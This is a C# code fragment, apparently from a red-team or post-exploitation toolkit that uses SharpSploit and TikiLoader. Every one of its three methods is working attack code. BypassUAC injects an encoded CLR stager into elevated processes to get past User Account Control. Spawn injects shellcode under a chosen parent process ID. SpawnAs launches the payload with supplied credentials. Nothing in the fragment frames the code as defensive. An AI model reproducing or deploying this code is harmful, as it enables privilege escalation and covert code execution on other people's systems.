public static bool BypassUAC(string binary, string path, string arguments) { SharpSploit.Credentials.Tokens t = new SharpSploit.Credentials.Tokens(); List <Process> processes = GetUserProcessTokens(true).Select(UPT => UPT.Process).ToList(); Console.WriteLine("Elevated processes: " + processes.Count); foreach (Process process in processes) { // Get PrimaryToken //Inject CLR and run stager byte[] payload = DecompressDLL(Convert.FromBase64String(nutclr)); try { var ldr = new TikiLoader.Loader(); ldr.LoadElevated(binary, payload, process.Id); return(t.RevertToSelf()); } catch (Exception) { t.RevertToSelf(); continue; } } return(false); }
public static bool Spawn(string binary, string shellcode, int ppid) { //Inject CLR and run stager byte[] payload = DecompressDLL(Convert.FromBase64String(shellcode)); try { var ldr = new TikiLoader.Loader(); ldr.Load(binary, payload, ppid); } catch (Exception e) { Console.WriteLine(e.Message); return(false); } return(true); }
public static bool SpawnAs(string binary, string shellcode, string domain, string username, string password) { //Inject CLR and run stager byte[] payload = DecompressDLL(Convert.FromBase64String(shellcode)); try { var ldr = new TikiLoader.Loader(); if (string.IsNullOrEmpty(domain)) { domain = "."; } ldr.LoadAs(binary, payload, domain, username, password); } catch (Exception e) { Console.WriteLine(e.Message); return(false); } return(true); }